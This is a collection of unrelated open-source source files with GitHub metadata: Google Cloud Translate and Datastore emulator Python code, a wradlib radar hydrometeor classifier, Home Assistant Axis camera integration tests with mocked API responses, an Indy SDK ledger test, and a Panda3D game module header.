:type client: :class:`~google.cloud.translate.client.Client`
:param client: The client that owns the current connection.
"""
API_BASE_URL = 'https://translation.googleapis.com'
"""The base of the API call URL."""
API_VERSION = 'v2'
"""The version of the API, used in building the API call's URL."""
API_URL_TEMPLATE = '{api_base_url}/language/translate/{api_version}{path}'
"""A template for the URL of a particular API call."""
_EXTRA_HEADERS = {
_http.CLIENT_INFO_HEADER: _CLIENT_INFO,
}
| {
"content_hash": "ed1254a06ad9898489e181458cf9326c",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 78,
"avg_line_length": 30.275862068965516,
"alnum_prop": 0.6799544419134397,
"repo_name": "tartavull/google-cloud-python",
"id": "dedb17ec9e14cdbfedc99b8653ebc2e56e033998",
"size": "1454",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "translate/google/cloud/translate_v2/_http.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62906"
},
{
"name": "Python",
"bytes": "4572894"
},
{
"name": "Shell",
"bytes": "4147"
}
],
"symlink_target": ""
} |
"""Python wrapper for the Cloud Datastore emulator."""
__author__ = 'eddavisson@google.com (Ed Davisson)'
import logging
import os
import shutil
import socket
import subprocess
import tempfile
import time
import zipfile
from googledatastore import connection
import httplib2
import portpicker
_DEFAULT_EMULATOR_OPTIONS = ['--testing']
class DatastoreEmulatorFactory(object):
"""A factory for constructing DatastoreEmulator objects."""
def __init__(self, working_directory, emulator_zip, java=None):
"""Constructs a factory for building datastore emulator instances.
Args:
working_directory: path to a directory where temporary files will be
stored
emulator_zip: path to the emulator zip file
java: path to a java executable
"""
self._working_directory = working_directory
self._emulators = {}
# Extract the emulator.
zipped_file = zipfile.ZipFile(emulator_zip)
if not os.path.isdir(self._working_directory):
os.mkdir(self._working_directory)
zipped_file.extractall(self._working_directory)
self._emulator_dir = os.path.join(self._working_directory,
'cloud-datastore-emulator')
self._emulator_cmd = os.path.join(self._emulator_dir,
'cloud_datastore_emulator')
os.chmod(self._emulator_cmd, 0700) # executable
# Make the emulator use our copy of Java.
if java:
os.environ['JAVA'] = java
def Get(self, project_id):
"""Returns an existing emulator instance for the provided project_id.
If an emulator instance doesn't yet exist, it creates one.
Args:
project_id: project ID
Returns:
a DatastoreEmulator
"""
if project_id in self._emulators:
return self._emulators[project_id]
emulator = self.Create(project_id)
self._emulators[project_id] = emulator
return emulator
def Create(self, project_id, start_options=None, deadline=10):
"""Creates an emulator instance.
This method will wait for up to 'deadline' seconds for the emulator to
start.
Args:
project_id: project ID
start_options: a list of additional command-line options to pass to the
emulator 'start' command
deadline: number of seconds to wait for the datastore to respond
Returns:
a DatastoreEmulator
Raises:
IOError: if the emulator could not be started within the deadline
"""
return DatastoreEmulator(self._emulator_cmd, self._working_directory,
project_id, deadline, start_options)
def __del__(self):
# Delete temp files.
shutil.rmtree(self._emulator_dir)
class DatastoreEmulator(object):
"""A Datastore emulator."""
def __init__(self, emulator_cmd, working_directory, project_id, deadline,
start_options):
"""Constructs a DatastoreEmulator.
Clients should use DatastoreEmulatorFactory to construct DatastoreEmulator
instances.
Args:
emulator_cmd: path to cloud_datastore_emulator
working_directory: directory file where temporary files will be stored
project_id: project ID
deadline: number of seconds to wait for the datastore to start
start_options: a list of additional command-line options to pass to the
emulator 'start' command
Raises:
IOError: if the emulator failed to start within the deadline
"""
self._project_id = project_id
self._emulator_cmd = emulator_cmd
self._http = httplib2.Http()
self.__running = False
self._tmp_dir = tempfile.mkdtemp(dir=working_directory)
self._project_directory = os.path.join(self._tmp_dir, self._project_id)
p = subprocess.Popen([emulator_cmd,
'create',
'--project_id=%s' % self._project_id,
self._project_directory])
if p.wait() != 0:
raise IOError('could not create project in directory: %s'
% self._project_directory)
# Start the emulator and wait for it to start responding to requests.
port = portpicker.PickUnusedPort()
self._host = 'http://localhost:%d' % port
cmd = [self._emulator_cmd, 'start', '--port=%d' % port]
cmd.extend(_DEFAULT_EMULATOR_OPTIONS)
if start_options:
cmd.extend(start_options)
cmd.append(self._project_directory)
subprocess.Popen(cmd)
if not self._WaitForStartup(deadline):
raise IOError('emulator did not respond within %ds' % deadline)
endpoint = '%s/v1/projects/%s' % (self._host, self._project_id)
self.__datastore = connection.Datastore(project_endpoint=endpoint)
self.__running = True
def GetDatastore(self):
"""Returns a googledatatsore.Datastore that is connected to the emulator."""
return self.__datastore
def _WaitForStartup(self, deadline):
"""Waits for the emulator to start.
Args:
deadline: deadline in seconds
Returns:
True if the emulator responds within the deadline, False otherwise.
"""
start = time.time()
sleep = 0.05
def Elapsed():
return time.time() - start
while True:
try:
response, _ = self._http.request(self._host)
if response.status == 200:
logging.info('emulator responded after %f seconds', Elapsed())
return True
except socket.error:
pass
if Elapsed() >= deadline:
# Out of time; give up.
return False
else:
time.sleep(sleep)
sleep *= 2
def Clear(self):
"""Clears all data from the emulator instance.
Returns:
True if the data was successfully cleared, False otherwise.
"""
headers = {'Content-length': '0'}
response, _ = self._http.request('%s/reset' % self._host, method='POST',
headers=headers)
if response.status == 200:
return True
else:
logging.warning('failed to clear emulator; response was: %s', response)
def Stop(self):
"""Stops the emulator instance."""
if not self.__running:
return
logging.info('shutting down the emulator running at %s', self._host)
headers = {'Content-length': '0'}
response, _ = self._http.request('%s/shutdown' % self._host,
method='POST', headers=headers)
if response.status != 200:
logging.warning('failed to shut down emulator; response: %s', response)
self.__running = False
# Delete temp files.
shutil.rmtree(self._tmp_dir)
def __del__(self):
# If the user forgets to call Stop()
logging.warning('emulator shutting down due to '
'DatastoreEmulator object deletion')
self.Stop()
| {
"content_hash": "f7fcea260a60dad9b328c87cc5bf6e49",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 80,
"avg_line_length": 30.986175115207374,
"alnum_prop": 0.6420285544318858,
"repo_name": "eddavisson/google-cloud-datastore",
"id": "4fe1b5e0aa17b7d3b1c07ec43aace23eb4f947ea",
"size": "7324",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/googledatastore/datastore_emulator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2202"
},
{
"name": "Java",
"bytes": "127536"
},
{
"name": "JavaScript",
"bytes": "1714"
},
{
"name": "Makefile",
"bytes": "6769"
},
{
"name": "Python",
"bytes": "79940"
}
],
"symlink_target": ""
} |
"""
Hydrometeor Classification (HMC)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. autosummary::
:nosignatures:
:toctree: generated/
{}
"""
__all__ = ["msf_index_indep", "trapezoid", "fuzzyfi", "probability", "classify"]
__doc__ = __doc__.format("\n ".join(__all__))
import numpy as np
pr_types = {
0: ("LR", "Light Rain"),
1: ("MR", "Moderate Rain"),
2: ("HR", "Heavy Rain"),
3: ("LD", "Large Drops"),
4: ("HL", "Hail"),
5: ("RH", "Rain/Hail"),
6: ("GH", "Graupel/Hail"),
7: ("DS", "Dry Snow"),
8: ("WS", "Wet Snow"),
9: ("HC", "H Crystals"),
10: ("VC", "V Crystals"),
11: ("NP", "No Precip"),
}
def msf_index_indep(msf, idp, obs):
"""Retrieve membership function values based on independent observable
Parameters
----------
msf : :class:`numpy:numpy.ndarray`
Array of size (hmc-classes, observables, indep-ranges, 4) containing
the values of the trapezoidal msf values for every hmc-class and
observable within the independent observable range.
idp : :class:`numpy:numpy.ndarray`
Array of length of the independent observable containing the ranges
of the independent observable.
obs : :class:`numpy:numpy.ndarray`
Array of arbitrary shape containing the data of the independent
observable (eg. (rays, bins) or (scan, rays, bins)).
Returns
-------
out : :class:`numpy:numpy.ndarray`
Array of shape (hmc-classes, observables, obs.shape, 4) containing the
membership function values for every radar-bin for every hmc-class and
observable.
"""
bins = np.append(idp, idp[-1] + (idp[-1] - idp[-2]))
idx = np.digitize(obs, bins) - 1
idx_mask = np.zeros_like(idx, dtype=np.bool_)
idxm = np.ma.array(idx, mask=idx_mask)
idxm = np.ma.masked_outside(idxm, 0, bins.shape[0] - 2)
out = np.zeros((msf.shape[0], msf.shape[1], obs.size, msf.shape[-1]))
out[:, :, ~idxm.mask.flatten(), :] = msf[:, :, idxm.compressed(), :]
out = np.reshape(out, ((msf.shape[0], msf.shape[1]) + obs.shape + (msf.shape[-1],)))
return out
def trapezoid(msf, obs):
"""Calculates membership of `obs` using trapezoidal
membership functions
Parameters
----------
msf : :class:`numpy:numpy.ndarray`
Array which is of size (obs.shape, 4), containing the trapezoidal
membership function values for every `obs` point for one particular
hydrometeor class.
obs : :class:`numpy:numpy.ndarray`
Array of arbitrary size and dimensions containing
the data from which the membership shall be calculated.
Returns
-------
out : :class:`numpy:numpy.ndarray`
Array which is of (obs.shape) containing calculated membership
probabilities.
"""
out = np.zeros_like(obs)
ones = (obs >= msf[..., 1]) & (obs <= msf[..., 2])
out[ones] = 1.0
lower = (obs >= msf[..., 0]) & (obs < msf[..., 1])
out[lower] = (obs[lower] - msf[..., 0][lower]) / (
msf[..., 1][lower] - msf[..., 0][lower]
)
higher = (obs > msf[..., 2]) & (obs <= msf[..., 3])
out[higher] = (obs[higher] - msf[..., 3][higher]) / (
msf[..., 2][higher] - msf[..., 3][higher]
)
return out
def fuzzyfi(msf, obs):
"""Iterate over all hmc-classes and retrieve memberships
Parameters
----------
msf : :class:`numpy:numpy.ndarray`
Array which is of size (hmc-class, obs.shape, 4), containing the
trapezoidal membership function values for every `obs` point for
every hydrometeor class.
obs : :class:`numpy:numpy.ndarray`
Array of arbitrary size and dimensions containing
the data from which the memberships shall be calculated.
Returns
-------
out : :class:`numpy:numpy.ndarray`
Array which is of (hmc-class, obs.shape) containing calculated
membership probabilities.
"""
out = np.zeros(msf.shape[0:-1])
for i, m in enumerate(msf):
out[i] = trapezoid(m, obs)
return out
def probability(data, weights):
"""Calculate probability of hmc-class for every data bin.
Parameters
----------
data : :class:`numpy:numpy.ndarray`
Array which is of size (hmc-class, obs, data.shape), containing the
membership probability values.
weights : :class:`numpy:numpy.ndarray`
Array of length (observables) containing the weights for
each observable.
Returns
-------
out : :class:`numpy:numpy.ndarray`
Array which is of (hmc-class, data.shape) containing weighted
hmc-membership probabilities.
"""
data = data.copy()
weights = weights.copy()
maxw = np.sum(weights)
weights.shape = (1, len(weights)) + len(data.shape[2:]) * (1,)
weights = np.broadcast_to(weights, data.shape)
return np.sum(data * weights, axis=1) / maxw
def classify(data, threshold=0.0):
"""Calculate probability of hmc-class for every data bin.
Parameters
----------
data : :py:class:`numpy:numpy.ndarray`
Array which is of size (hmc-class, data.shape), containing the
weighted hmc-membership probability values.
Keyword Arguments
-----------------
threshold : float
Threshold value where probability is considered no precip,
defaults to 0
Returns
-------
idx : :py:class:`numpy:numpy.ndarray`
Array which is of (data.shape) containing the (sorted) index into
the hydrometeor-class.
No precip is added on the top.
vals : :py:class:`numpy:numpy.ndarray`
Array which is of (data.shape) containing the (sorted) probability
scores. No precip is added on the top.
"""
data = data.copy()
shape = data.shape[0]
# handle no precipitation
nop = np.sum(data, axis=0) / data.shape[0]
mask = nop <= threshold
# add no precip field (with zero probability)
noprec = np.zeros_like(nop)
data = np.vstack((data, noprec[np.newaxis, ...]))
# sort idx and vals
idx = np.argsort(data, axis=0)
vals = np.sort(data, axis=0)
# set no precip in every class
idx[:, mask] = shape
vals[:, mask] = 1.0
return idx, vals
| {
"content_hash": "a8a78477a900afb01dafd4e9d8de127a",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 88,
"avg_line_length": 31.246231155778894,
"alnum_prop": 0.5968156963653908,
"repo_name": "wradlib/wradlib",
"id": "a646887d21f0f75d0bb0d4d431a17b76052c1fe8",
"size": "6356",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "wradlib/classify.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Fortran",
"bytes": "2191"
},
{
"name": "Python",
"bytes": "1287418"
},
{
"name": "Shell",
"bytes": "1209"
}
],
"symlink_target": ""
} |
"""Test Axis device."""
from copy import deepcopy
from unittest import mock
from unittest.mock import Mock, patch
import axis as axislib
from axis.event_stream import OPERATION_INITIALIZED
import pytest
import respx
from homeassistant.components import axis, zeroconf
from homeassistant.components.axis.const import (
CONF_EVENTS,
CONF_MODEL,
DOMAIN as AXIS_DOMAIN,
)
from homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN
from homeassistant.config_entries import SOURCE_ZEROCONF
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.helpers import device_registry as dr
from tests.common import MockConfigEntry, async_fire_mqtt_message
MAC = "00408C123456"
FORMATTED_MAC = "00:40:8c:12:34:56"
MODEL = "model"
NAME = "name"
DEFAULT_HOST = "1.2.3.4"
ENTRY_OPTIONS = {CONF_EVENTS: True}
ENTRY_CONFIG = {
CONF_HOST: DEFAULT_HOST,
CONF_USERNAME: "root",
CONF_PASSWORD: "pass",
CONF_PORT: 80,
CONF_MODEL: MODEL,
CONF_NAME: NAME,
}
API_DISCOVERY_RESPONSE = {
"method": "getApiList",
"apiVersion": "1.0",
"data": {
"apiList": [
{"id": "api-discovery", "version": "1.0", "name": "API Discovery Service"},
{"id": "param-cgi", "version": "1.0", "name": "Legacy Parameter Handling"},
]
},
}
API_DISCOVERY_BASIC_DEVICE_INFO = {
"id": "basic-device-info",
"version": "1.1",
"name": "Basic Device Information",
}
API_DISCOVERY_MQTT = {"id": "mqtt-client", "version": "1.0", "name": "MQTT Client API"}
API_DISCOVERY_PORT_MANAGEMENT = {
"id": "io-port-management",
"version": "1.0",
"name": "IO Port Management",
}
APPLICATIONS_LIST_RESPONSE = """<reply result="ok">
<application Name="vmd" NiceName="AXIS Video Motion Detection" Vendor="Axis Communications" Version="4.2-0" ApplicationID="143440" License="None" Status="Running" ConfigurationPage="local/vmd/config.html" VendorHomePage="http://www.axis.com" />
</reply>"""
BASIC_DEVICE_INFO_RESPONSE = {
"apiVersion": "1.1",
"data": {
"propertyList": {
"ProdNbr": "M1065-LW",
"ProdType": "Network Camera",
"SerialNumber": MAC,
"Version": "9.80.1",
}
},
}
LIGHT_CONTROL_RESPONSE = {
"apiVersion": "1.1",
"method": "getLightInformation",
"data": {
"items": [
{
"lightID": "led0",
"lightType": "IR",
"enabled": True,
"synchronizeDayNightMode": True,
"lightState": False,
"automaticIntensityMode": False,
"automaticAngleOfIlluminationMode": False,
"nrOfLEDs": 1,
"error": False,
"errorInfo": "",
}
]
},
}
MQTT_CLIENT_RESPONSE = {
"apiVersion": "1.0",
"context": "some context",
"method": "getClientStatus",
"data": {"status": {"state": "active", "connectionStatus": "Connected"}},
}
PORT_MANAGEMENT_RESPONSE = {
"apiVersion": "1.0",
"method": "getPorts",
"data": {
"numberOfPorts": 1,
"items": [
{
"port": "0",
"configurable": False,
"usage": "",
"name": "PIR sensor",
"direction": "input",
"state": "open",
"normalState": "open",
}
],
},
}
VMD4_RESPONSE = {
"apiVersion": "1.4",
"method": "getConfiguration",
"context": "Axis library",
"data": {
"cameras": [{"id": 1, "rotation": 0, "active": True}],
"profiles": [
{"filters": [], "camera": 1, "triggers": [], "name": "Profile 1", "uid": 1}
],
},
}
BRAND_RESPONSE = """root.Brand.Brand=AXIS
root.Brand.ProdFullName=AXIS M1065-LW Network Camera
root.Brand.ProdNbr=M1065-LW
root.Brand.ProdShortName=AXIS M1065-LW
root.Brand.ProdType=Network Camera
root.Brand.ProdVariant=
root.Brand.WebURL=http://www.axis.com
"""
IMAGE_RESPONSE = """root.Image.I0.Enabled=yes
root.Image.I0.Name=View Area 1
root.Image.I0.Source=0
root.Image.I1.Enabled=no
root.Image.I1.Name=View Area 2
root.Image.I1.Source=0
"""
PORTS_RESPONSE = """root.Input.NbrOfInputs=1
root.IOPort.I0.Configurable=no
root.IOPort.I0.Direction=input
root.IOPort.I0.Input.Name=PIR sensor
root.IOPort.I0.Input.Trig=closed
root.Output.NbrOfOutputs=0
"""
PROPERTIES_RESPONSE = f"""root.Properties.API.HTTP.Version=3
root.Properties.API.Metadata.Metadata=yes
root.Properties.API.Metadata.Version=1.0
root.Properties.EmbeddedDevelopment.Version=2.16
root.Properties.Firmware.BuildDate=Feb 15 2019 09:42
root.Properties.Firmware.BuildNumber=26
root.Properties.Firmware.Version=9.10.1
root.Properties.Image.Format=jpeg,mjpeg,h264
root.Properties.Image.NbrOfViews=2
root.Properties.Image.Resolution=1920x1080,1280x960,1280x720,1024x768,1024x576,800x600,640x480,640x360,352x240,320x240
root.Properties.Image.Rotation=0,180
root.Properties.System.SerialNumber={MAC}
"""
PTZ_RESPONSE = ""
STREAM_PROFILES_RESPONSE = """root.StreamProfile.MaxGroups=26
root.StreamProfile.S0.Description=profile_1_description
root.StreamProfile.S0.Name=profile_1
root.StreamProfile.S0.Parameters=videocodec=h264
root.StreamProfile.S1.Description=profile_2_description
root.StreamProfile.S1.Name=profile_2
root.StreamProfile.S1.Parameters=videocodec=h265
"""
VIEW_AREAS_RESPONSE = {"apiVersion": "1.0", "method": "list", "data": {"viewAreas": []}}
def mock_default_vapix_requests(respx: respx, host: str = DEFAULT_HOST) -> None:
"""Mock default Vapix requests responses."""
respx.post(f"http://{host}:80/axis-cgi/apidiscovery.cgi").respond(
json=API_DISCOVERY_RESPONSE,
)
respx.post(f"http://{host}:80/axis-cgi/basicdeviceinfo.cgi").respond(
json=BASIC_DEVICE_INFO_RESPONSE,
)
respx.post(f"http://{host}:80/axis-cgi/io/portmanagement.cgi").respond(
json=PORT_MANAGEMENT_RESPONSE,
)
respx.post(f"http://{host}:80/axis-cgi/lightcontrol.cgi").respond(
json=LIGHT_CONTROL_RESPONSE,
)
respx.post(f"http://{host}:80/axis-cgi/mqtt/client.cgi").respond(
json=MQTT_CLIENT_RESPONSE,
)
respx.post(f"http://{host}:80/axis-cgi/streamprofile.cgi").respond(
json=STREAM_PROFILES_RESPONSE,
)
respx.post(f"http://{host}:80/axis-cgi/viewarea/info.cgi").respond(
json=VIEW_AREAS_RESPONSE
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Brand"
).respond(
text=BRAND_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Image"
).respond(
text=IMAGE_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Input"
).respond(
text=PORTS_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.IOPort"
).respond(
text=PORTS_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Output"
).respond(
text=PORTS_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Properties"
).respond(
text=PROPERTIES_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.PTZ"
).respond(
text=PTZ_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.get(
f"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.StreamProfile"
).respond(
text=STREAM_PROFILES_RESPONSE,
headers={"Content-Type": "text/plain"},
)
respx.post(f"http://{host}:80/axis-cgi/applications/list.cgi").respond(
text=APPLICATIONS_LIST_RESPONSE,
headers={"Content-Type": "text/xml"},
)
respx.post(f"http://{host}:80/local/vmd/control.cgi").respond(json=VMD4_RESPONSE)
async def setup_axis_integration(hass, config=ENTRY_CONFIG, options=ENTRY_OPTIONS):
"""Create the Axis device."""
config_entry = MockConfigEntry(
domain=AXIS_DOMAIN,
data=deepcopy(config),
options=deepcopy(options),
version=3,
unique_id=FORMATTED_MAC,
)
config_entry.add_to_hass(hass)
with respx.mock:
mock_default_vapix_requests(respx)
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
return config_entry
async def test_device_setup(hass):
"""Successful setup."""
with patch(
"homeassistant.config_entries.ConfigEntries.async_forward_entry_setup",
return_value=True,
) as forward_entry_setup:
config_entry = await setup_axis_integration(hass)
device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
assert device.api.vapix.firmware_version == "9.10.1"
assert device.api.vapix.product_number == "M1065-LW"
assert device.api.vapix.product_type == "Network Camera"
assert device.api.vapix.serial_number == "00408C123456"
entry = device.config_entry
assert len(forward_entry_setup.mock_calls) == 4
assert forward_entry_setup.mock_calls[0][1] == (entry, "binary_sensor")
assert forward_entry_setup.mock_calls[1][1] == (entry, "camera")
assert forward_entry_setup.mock_calls[2][1] == (entry, "light")
assert forward_entry_setup.mock_calls[3][1] == (entry, "switch")
assert device.host == ENTRY_CONFIG[CONF_HOST]
assert device.model == ENTRY_CONFIG[CONF_MODEL]
assert device.name == ENTRY_CONFIG[CONF_NAME]
assert device.unique_id == FORMATTED_MAC
device_registry = dr.async_get(hass)
device_entry = device_registry.async_get_device(
identifiers={(AXIS_DOMAIN, device.unique_id)}
)
assert device_entry.configuration_url == device.api.config.url
async def test_device_info(hass):
"""Verify other path of device information works."""
api_discovery = deepcopy(API_DISCOVERY_RESPONSE)
api_discovery["data"]["apiList"].append(API_DISCOVERY_BASIC_DEVICE_INFO)
with patch.dict(API_DISCOVERY_RESPONSE, api_discovery):
config_entry = await setup_axis_integration(hass)
device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
assert device.api.vapix.firmware_version == "9.80.1"
assert device.api.vapix.product_number == "M1065-LW"
assert device.api.vapix.product_type == "Network Camera"
assert device.api.vapix.serial_number == "00408C123456"
async def test_device_support_mqtt(hass, mqtt_mock):
"""Successful setup."""
api_discovery = deepcopy(API_DISCOVERY_RESPONSE)
api_discovery["data"]["apiList"].append(API_DISCOVERY_MQTT)
with patch.dict(API_DISCOVERY_RESPONSE, api_discovery):
await setup_axis_integration(hass)
mqtt_mock.async_subscribe.assert_called_with(f"{MAC}/#", mock.ANY, 0, "utf-8")
topic = f"{MAC}/event/tns:onvif/Device/tns:axis/Sensor/PIR/$source/sensor/0"
message = b'{"timestamp": 1590258472044, "topic": "onvif:Device/axis:Sensor/PIR", "message": {"source": {"sensor": "0"}, "key": {}, "data": {"state": "1"}}}'
assert len(hass.states.async_entity_ids(BINARY_SENSOR_DOMAIN)) == 0
async_fire_mqtt_message(hass, topic, message)
await hass.async_block_till_done()
assert len(hass.states.async_entity_ids(BINARY_SENSOR_DOMAIN)) == 1
pir = hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_pir_0")
assert pir.state == STATE_ON
assert pir.name == f"{NAME} PIR 0"
async def test_update_address(hass):
"""Test update address works."""
config_entry = await setup_axis_integration(hass)
device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
assert device.api.config.host == "1.2.3.4"
with patch(
"homeassistant.components.axis.async_setup_entry",
return_value=True,
) as mock_setup_entry, respx.mock:
mock_default_vapix_requests(respx, "2.3.4.5")
await hass.config_entries.flow.async_init(
AXIS_DOMAIN,
data=zeroconf.ZeroconfServiceInfo(
host="2.3.4.5",
addresses=["2.3.4.5"],
hostname="mock_hostname",
name="name",
port=80,
properties={"macaddress": MAC},
type="mock_type",
),
context={"source": SOURCE_ZEROCONF},
)
await hass.async_block_till_done()
assert device.api.config.host == "2.3.4.5"
assert len(mock_setup_entry.mock_calls) == 1
async def test_device_unavailable(hass, mock_rtsp_event, mock_rtsp_signal_state):
"""Successful setup."""
await setup_axis_integration(hass)
# Provide an entity that can be used to verify connection state on
mock_rtsp_event(
topic="tns1:AudioSource/tnsaxis:TriggerLevel",
data_type="triggered",
data_value="10",
source_name="channel",
source_idx="1",
)
await hass.async_block_till_done()
assert hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_sound_1").state == STATE_OFF
# Connection to device has failed
mock_rtsp_signal_state(connected=False)
await hass.async_block_till_done()
assert (
hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_sound_1").state
== STATE_UNAVAILABLE
)
# Connection to device has been restored
mock_rtsp_signal_state(connected=True)
await hass.async_block_till_done()
assert hass.states.get(f"{BINARY_SENSOR_DOMAIN}.{NAME}_sound_1").state == STATE_OFF
async def test_device_reset(hass):
"""Successfully reset device."""
config_entry = await setup_axis_integration(hass)
device = hass.data[AXIS_DOMAIN][config_entry.unique_id]
result = await device.async_reset()
assert result is True
async def test_device_not_accessible(hass):
"""Failed setup schedules a retry of setup."""
with patch.object(axis.device, "get_device", side_effect=axis.errors.CannotConnect):
await setup_axis_integration(hass)
assert hass.data[AXIS_DOMAIN] == {}
async def test_device_trigger_reauth_flow(hass):
"""Failed authentication trigger a reauthentication flow."""
with patch.object(
axis.device, "get_device", side_effect=axis.errors.AuthenticationRequired
), patch.object(hass.config_entries.flow, "async_init") as mock_flow_init:
await setup_axis_integration(hass)
mock_flow_init.assert_called_once()
assert hass.data[AXIS_DOMAIN] == {}
async def test_device_unknown_error(hass):
"""Unknown errors are handled."""
with patch.object(axis.device, "get_device", side_effect=Exception):
await setup_axis_integration(hass)
assert hass.data[AXIS_DOMAIN] == {}
async def test_new_event_sends_signal(hass):
"""Make sure that new event send signal."""
entry = Mock()
entry.data = ENTRY_CONFIG
axis_device = axis.device.AxisNetworkDevice(hass, entry)
with patch.object(axis.device, "async_dispatcher_send") as mock_dispatch_send:
axis_device.async_event_callback(action=OPERATION_INITIALIZED, event_id="event")
await hass.async_block_till_done()
assert len(mock_dispatch_send.mock_calls) == 1
assert len(mock_dispatch_send.mock_calls[0]) == 3
async def test_shutdown():
"""Successful shutdown."""
hass = Mock()
entry = Mock()
entry.data = ENTRY_CONFIG
axis_device = axis.device.AxisNetworkDevice(hass, entry)
axis_device.api = Mock()
await axis_device.shutdown(None)
assert len(axis_device.api.stream.stop.mock_calls) == 1
async def test_get_device_fails(hass):
"""Device unauthorized yields authentication required error."""
with patch(
"axis.vapix.Vapix.request", side_effect=axislib.Unauthorized
), pytest.raises(axis.errors.AuthenticationRequired):
await axis.device.get_device(hass, host="", port="", username="", password="")
async def test_get_device_device_unavailable(hass):
"""Device unavailable yields cannot connect error."""
with patch(
"axis.vapix.Vapix.request", side_effect=axislib.RequestError
), pytest.raises(axis.errors.CannotConnect):
await axis.device.get_device(hass, host="", port="", username="", password="")
async def test_get_device_unknown_error(hass):
"""Device yield unknown error."""
with patch(
"axis.vapix.Vapix.request", side_effect=axislib.AxisException
), pytest.raises(axis.errors.AuthenticationRequired):
await axis.device.get_device(hass, host="", port="", username="", password="")
| {
"content_hash": "3e84c341c8b6e5fe69e94c198ff4013c",
"timestamp": "",
"source": "github",
"line_count": 519,
"max_line_length": 245,
"avg_line_length": 32.626204238921005,
"alnum_prop": 0.6473749483257545,
"repo_name": "rohitranjan1991/home-assistant",
"id": "cca62babbb59d66fcc6c24ea31ab844977b7146d",
"size": "16933",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "tests/components/axis/test_device.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1017265"
},
{
"name": "Python",
"bytes": "1051086"
},
{
"name": "Shell",
"bytes": "3946"
}
],
"symlink_target": ""
} |
from indy import ledger
import json
import pytest
@pytest.mark.asyncio
async def test_build_get_nym_request_works():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "FYmoFw55GeQH7SRFa37dkx1d2dZ3zUF8ckg7wmL7ofN4"
expected_response = {
"identifier": identifier,
"operation": {
"type": "105",
"dest": destination
}
}
response = json.loads(await ledger.build_get_nym_request(identifier, destination))
assert expected_response.items() <= response.items()
| {
"content_hash": "7e43747819d82146f19988ec79699ae2",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 86,
"avg_line_length": 25.285714285714285,
"alnum_prop": 0.6685499058380414,
"repo_name": "korsimoro/indy-sdk",
"id": "369d55cbf2f156053c3c3edd826bf6ced3c6ce2e",
"size": "531",
"binary": false,
"copies": "1",
"ref": "refs/heads/init-node-wrapper",
"path": "wrappers/python/tests/ledger/test_build_get_nym_request.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "423067"
},
{
"name": "C#",
"bytes": "491793"
},
{
"name": "C++",
"bytes": "11939"
},
{
"name": "CSS",
"bytes": "71200"
},
{
"name": "HTML",
"bytes": "2878400"
},
{
"name": "Java",
"bytes": "411820"
},
{
"name": "Makefile",
"bytes": "143"
},
{
"name": "Objective-C",
"bytes": "838982"
},
{
"name": "Objective-C++",
"bytes": "618651"
},
{
"name": "Python",
"bytes": "302072"
},
{
"name": "Ruby",
"bytes": "4344"
},
{
"name": "Rust",
"bytes": "1554404"
},
{
"name": "Shell",
"bytes": "3854"
},
{
"name": "TypeScript",
"bytes": "163582"
}
],
"symlink_target": ""
} |
import ai
import controllers
import entities
import ui
import net
import audio
import particles
import traceback
from direct.showbase.DirectObject import DirectObject
from pandac.PandaModules import *
from direct.task import Task
from direct.filter.CommonFilters import CommonFilters
from direct.actor.Actor import Actor
from direct.directnotify.DirectNotify import DirectNotify
from direct.stdpy.file import *
import sys
import time
import math
import os
from random import uniform
clock = None # Global clock
renderLit = None # Parent nodepath for all objects that are affected by lights
renderObjects = None # Parent nodepath for dynamic objects
renderEnvironment = None # Parent nodepath for environment geometry
lights = [] # List of all light objects
lightNodes = [] # List of tuples containing lights and their nodepaths, respectively
cubeMap = None # Cubemap for all environment mapping
reflectionBuffer = None # Frame buffer for reflection effects
reflectionCamera = None # Camera to render into reflection buffer
